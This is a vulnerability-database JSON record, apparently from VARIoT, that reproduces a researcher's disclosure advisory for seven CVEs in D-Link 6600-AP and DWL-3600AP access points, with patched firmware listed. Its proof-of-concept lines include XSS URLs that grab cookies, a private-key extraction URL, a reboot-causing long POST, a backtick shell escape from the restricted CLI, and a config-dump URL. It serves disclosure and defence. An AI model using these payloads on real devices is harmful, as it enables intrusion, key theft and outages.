{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14332"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14335"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14333"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=%s"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=+guest\u003cscript\u003ealert(\u0027pwned\u0027)\u003c/script\u003e"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=\u003cscript\u003ealert(document.cookie)\u003c/script\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14334"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/sslcert-get.cgi?"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14338"
},
{
"trust": 0.1,
"url": "https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action="
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29141"
},
{
"db": "VULHUB",
"id": "VHN-146273"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007493"
},
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1630"
},
{
"db": "NVD",
"id": "CVE-2019-14337"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-29141"
},
{
"db": "VULHUB",
"id": "VHN-146273"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007493"
},
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1630"
},
{
"db": "NVD",
"id": "CVE-2019-14337"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-29141"
},
{
"date": "2019-08-01T00:00:00",
"db": "VULHUB",
"id": "VHN-146273"
},
{
"date": "2019-08-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-007493"
},
{
"date": "2019-07-31T19:01:29",
"db": "PACKETSTORM",
"id": "153840"
},
{
"date": "2019-07-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-1630"
},
{
"date": "2019-08-01T13:15:14.257000",
"db": "NVD",
"id": "CVE-2019-14337"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-29141"
},
{
"date": "2020-08-24T00:00:00",
"db": "VULHUB",
"id": "VHN-146273"
},
{
"date": "2019-08-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-007493"
},
{
"date": "2021-04-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-1630"
},
{
"date": "2024-11-21T04:26:32.333000",
"db": "NVD",
"id": "CVE-2019-14337"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-1630"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link 6600-AP and DWL-3600AP Vulnerabilities related to authorization, authority, and access control in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-007493"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system command injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-1630"
}
],
"trust": 0.6
}
}
VAR-201908-0910
Vulnerability from variot - Updated: 2024-11-23 21:52
An issue was discovered on D-Link 6600-AP and DWL-3600AP Ax 4.2.0.14 21/03/2019 devices. There is use of weak ciphers for SSH such as diffie-hellman-group1-sha1. The D-Link 6600-AP and DWL-3600AP devices contain a cryptographic strength vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). The D-Link 6600-AP and DWL-3600AP are both wireless access point devices from D-Link, Taiwan. There are security vulnerabilities in the D-Link 6600-AP and DWL-3600AP. An attacker could exploit the vulnerability to brute force SSH passwords. Currently there is no information about this vulnerability, please keep an eye on CNNVD or vendor announcements.
# Security Advisory - 22/07/2019
Multiple vulnerabilities found in the D-Link 6600-AP device running the latest firmware (version 4.2.0.14). D-Link 6600-AP is not produced anymore but the support is still provided by D-Link as described on the D-Link website. Note that this product is built for business customers of D-Link and we can expect to have thousands of devices at risk. Code base shared with DWL-3600AP and DWL-8610AP
This advisory is sent to D-Link the 22/05/2019
Many Thanks to the D-Link Security Team for their prompt reactivity!
Affected Product
D-Link 6600-AP, DWL-3600AP + Vulnerability number 2 affects also DWL-8610AP
Firmware version
4.2.0.14 Revision Ax date: 21/03/2019
Last version available
https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point
Product Identifier
WLAN-EAP
Hardware Version
A2
Manufacturer
D-LINK
Product Description
The DWL-6600AP is designed to be the best-in-class indoor Access Point for business environments. With high data transmission speeds, load balancing features, it can be deployed as a standalone wireless Access Point or used as the foundation for a managed wireless network. Source: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point
List of Vulnerabilities
- CVE-2019-14338 - Post-authenticated XSS
- CVE-2019-14334 - Post-authenticated Certificate and RSA Private Key extraction through http command
- CVE-2019-14333 - Pre-authenticated Denial of service leading to the reboot of the AP
- CVE-2019-14337 - Escape shell in the restricted command line interface
- CVE-2019-14335 - Post-authenticated Denial of service leading to the reboot of the AP
- CVE-2019-14336 - Post-authenticated Dump all the config files (post-auth)
1. Post-authenticated XSS
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14338
Proof-of concept
Example 1: http://10.90.90.91/admin.cgi?action=<script>alert(document.cookie)</script>
Example 2: http://10.90.90.91/admin.cgi?action=+guest<script>alert('Pwned')</script>
2. Post-authenticated Certificate and RSA Private Key extraction through http command
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14334
Proof-of concept
http://10.90.90.91/sslcert-get.cgi?
Result of the command: File "mini_httpd.pem" automatically extracted
3. Pre-authenticated Denial of service leading to the reboot of the AP
Exploitation: Local
Severity Level: High
CVE ID: CVE-2019-14333
Proof-of concept
kali# curl -X POST 'http://10.90.90.91/admin.cgi?action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
4. Escape shell in the restricted command line interface
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14337
Proof-of concept
DLINK-WLAN-AP# wget
Invalid command.
DLINK-WLAN-AP# `/bin/sh -c wget`
BusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary.
Usage: wget [-c|--continue] [-s|--spider] [-q|--quiet]
[-O|--output-document FILE]
[--header 'header: value'] [-Y|--proxy on/off] [-P DIR]
[--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL
Retrieve files via HTTP or FTP
Options:
 -s Spider mode - only check file existence
 -c Continue retrieval of aborted transfer
 -q Quiet
 -P DIR Save to DIR (default .)
 -T SEC Network read timeout is SEC seconds
 -O FILE Save to FILE ('-' for stdout)
 -U STR Use STR for User-Agent header
 -Y Use proxy ('on' or 'off')
DLINK-WLAN-AP#
5. Post-authenticated Denial of service leading to the reboot of the AP
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14335
Proof-of concept
http://10.90.90.91/admin.cgi?action=%s
6. Post-authenticated Dump all the config files
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14336
Proof-of concept
http://10.90.90.91/admin.cgi?action=
7. Use of weak ciphers
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14332
Proof-of concept
root@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1
The authenticity of host '10.90.90.91 (10.90.90.91)' can't be established.
RSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.90.90.91' (RSA) to the list of known hosts.
admin@10.90.90.91's password:
Enter 'help' for help.
DLINK-WLAN-AP# help
Report Timeline
22/05/2019 : This advisory is sent to D-Link - the contents of this Report will be made public within 30 days.
22/06/2019 : Public release of the security advisory to mailing list
Fixes/Updates
ftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip
ftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip
About me - pwn.sandstorm@gmail.com
Independent EMSecurity Researcher in the field of IoT under the Sun
Always open to hack and share
Greetings - Ack P. Kim and others for the online resources
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201908-0910",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "6600-ap",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "4.2.0.14"
},
{
"model": "dwl-3600ap",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "4.2.0.14"
},
{
"model": "d-link 6600-ap",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "4.2.0.14"
},
{
"model": "dwl-3600ap",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "4.2.0.14"
},
{
"model": "6600-ap",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dwl-3600ap",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29144"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007260"
},
{
"db": "NVD",
"id": "CVE-2019-14332"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:d-link:6600-ap_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dwl-3600ap_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-007260"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sandstorm Security",
"sources": [
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1640"
}
],
"trust": 0.7
},
"cve": "CVE-2019-14332",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "CVE-2019-14332",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "CNVD-2019-29144",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "VHN-146268",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:L/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.8,
"id": "CVE-2019-14332",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-14332",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-14332",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2019-14332",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2019-29144",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201907-1640",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-146268",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29144"
},
{
"db": "VULHUB",
"id": "VHN-146268"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007260"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1640"
},
{
"db": "NVD",
"id": "CVE-2019-14332"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered on D-Link 6600-AP and DWL-3600AP Ax 4.2.0.14 21/03/2019 devices. There is use of weak ciphers for SSH such as diffie-hellman-group1-sha1. D-Link 6600-AP and DWL-3600AP The device contains a cryptographic strength vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The D-Link 6600-AP and DWL-3600AP are both wireless access point devices from D-Link, Taiwan. There are security vulnerabilities in the D-Link 6600-AP and DWL-3600AP. An attacker could exploit the vulnerability to brute force SSH passwords. Currently there is no information about this vulnerability, please keep an eye on CNNVD or vendor announcements. # Security Advisory - 22/07/2019\n\n## Multiple vulnerabilities found in the D-Link 6600-AP device running\nthe latest firmware (version 4.2.0.14). D-Link 6600-AP is not produced\nanymore but the support is still provided by D-Link as per described\non the D-Link website. Not that this product is built for business\ncustomers of D-Link and we can expect to have thousands of devices at\nrisk. Code base shared with DWL-3600AP and DWL-8610AP\n\n### This advisory is sent to D-Link the 22/05/2019\nMany Thanks to the D-Link Security Team for their prompt reactivity!\n\n### Affected Product\nD-Link 6600-AP, DWL-3600AP + Vulnerability number 2 affects also DWL-8610AP\n\n### Firmware version\n4.2.0.14 Revision Ax date: 21/03/2019\n\n### Last version available\nhttps://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point\n\n### Product Identifier\nWLAN-EAP\n\n### Hardware Version\nA2\n\n### Manufacturer\nD-LINK\n\n## Product Description\nThe DWL-6600AP is designed to be the best-in-class indoor Access Point\nfor business environments. 
With high data transmission speeds, load\nbalancing features, it can be deployed as a standalone wireless Access\nPoint or used as the foundation for a managed wireless network. \nSource: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point\n\n## List of Vulnerabilities\n\n 1. CVE-2019-14338 - Post-authenticated XSS\n 2. CVE-2019-14334 - Post-authenticated Certificate and RSA Private\nKey extraction\nthrough http command\n 3. CVE-2019-14333 - Pre-authenticated Denial of service leading to\nthe reboot of the AP\n 4. CVE-2019-14337 - Escape shell in the restricted command line interface\n 5. CVE-2019-14335 - Post-authenticated Denial of service leading to\nthe reboot of the AP\n 6. CVE-2019-14336 - Post-authenticated Dump all the config files (post-auth)\n 7. Post-authenticated XSS\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14338\n#### Proof-of concept\n\nExample 1: http://10.90.90.91/admin.cgi?action=\u003cscript\u003ealert(document.cookie)\u003c/script\u003e\n\nExample 2: http://10.90.90.91/admin.cgi?action=+guest\u003cscript\u003ealert(\u0027Pwned\u0027)\u003c/script\u003e\n\n### 2. 
Post-authenticated Certificate and RSA Private Key extraction\nthrough http command\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14334\n#### Proof-of concept\n\nhttp://10.90.90.91/sslcert-get.cgi?\n\nResult of the command: File \"mini_httpd.pem\" automatically extracted\n\n### 3. Pre-authenticated Denial of service leading to the reboot of the AP\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID: CVE-2019-14333\n#### Proof-of concept\n kali# curl -X POST\n\u0027http://10.90.90.91/admin.cgi?action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\n### 4. 
Escape shell in the restricted command line interface\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14337\n#### Proof-of concept\n\nDLINK-WLAN-AP# wget\nInvalid command. \nDLINK-WLAN-AP# `/bin/sh -c wget`\nBusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary. \nUsage: wget [-c|--continue] [-s|--spider] [-q|--quiet]\n[-O|--output-document FILE]\n [--header \u0027header: value\u0027] [-Y|--proxy on/off] [-P DIR]\n [--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL\n\nRetrieve files via HTTP or FTP\n\nOptions:\n -s Spider mode - only check file existence\n -c Continue retrieval of aborted transfer\n -q Quiet\n -P DIR Save to DIR (default .)\n -T SEC Network read timeout is SEC seconds\n -O FILE Save to FILE (\u0027-\u0027 for stdout)\n -U STR Use STR for User-Agent header\n -Y Use proxy (\u0027on\u0027 or \u0027off\u0027)\n\nDLINK-WLAN-AP#\n\n### 5. Post-authenticated Denial of service leading to the reboot of the AP\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14335\n#### Proof-of concept\n\nhttp://10.90.90.91/admin.cgi?action=%s\n\n### 6. Post-authenticated Dump all the config files\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14336\n#### Proof-of concept\n\nhttp://10.90.90.91/admin.cgi?action=\n\n### 7. Use of weak ciphers\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14332\n#### Proof-of concept\n\nroot@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1\nThe authenticity of host \u002710.90.90.91 (10.90.90.91)\u0027 can\u0027t be established. \nRSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI. \nAre you sure you want to continue connecting (yes/no)? yes\nWarning: Permanently added \u002710.90.90.91\u0027 (RSA) to the list of known hosts. \nadmin@10.90.90.91\u0027s password:\nEnter \u0027help\u0027 for help. 
\n\nDLINK-WLAN-AP# help\n\n## Report Timeline\n22/05/2019 : This advisory is sent to D-Link - the contents of this\nReport will be made public within 30 days. \n22/06/2019 : Public release of the security advisory to mailing list\n\n## Fixes/Updates\nftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip\nftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip\n\n\n## About me - pwn.sandstorm@gmail.com\n#### Independent EMSecurity Researcher in the field of IoT under the Sun\n#### Always open to hack and share\n#### Greetings - Ack P. Kim and others for the online resources\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-14332"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007260"
},
{
"db": "CNVD",
"id": "CNVD-2019-29144"
},
{
"db": "VULHUB",
"id": "VHN-146268"
},
{
"db": "PACKETSTORM",
"id": "153840"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "PACKETSTORM",
"id": "153840",
"trust": 3.2
},
{
"db": "NVD",
"id": "CVE-2019-14332",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007260",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1640",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2019-29144",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-146268",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29144"
},
{
"db": "VULHUB",
"id": "VHN-146268"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007260"
},
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1640"
},
{
"db": "NVD",
"id": "CVE-2019-14332"
}
]
},
"id": "VAR-201908-0910",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29144"
},
{
"db": "VULHUB",
"id": "VHN-146268"
}
],
"trust": 1.3903846
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29144"
}
]
},
"last_update_date": "2024-11-23T21:52:00.662000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory",
"trust": 0.8,
"url": "https://us.dlink.com/en/security-advisory"
},
{
"title": "Security Bulletin",
"trust": 0.8,
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"title": "Patch for D-Link 6600-AP and DWL-3600AP SSH Weak Password Vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/177609"
},
{
"title": "D-Link 6600-AP and DWL-3600AP Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=95749"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29144"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007260"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1640"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-326",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-146268"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007260"
},
{
"db": "NVD",
"id": "CVE-2019-14332"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://packetstormsecurity.com/files/153840/d-link-6600-ap-xss-dos-information-disclosure.html"
},
{
"trust": 1.7,
"url": "https://us.dlink.com/en/security-advisory"
},
{
"trust": 1.7,
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14332"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-14332"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14336"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14335"
},
{
"trust": 0.1,
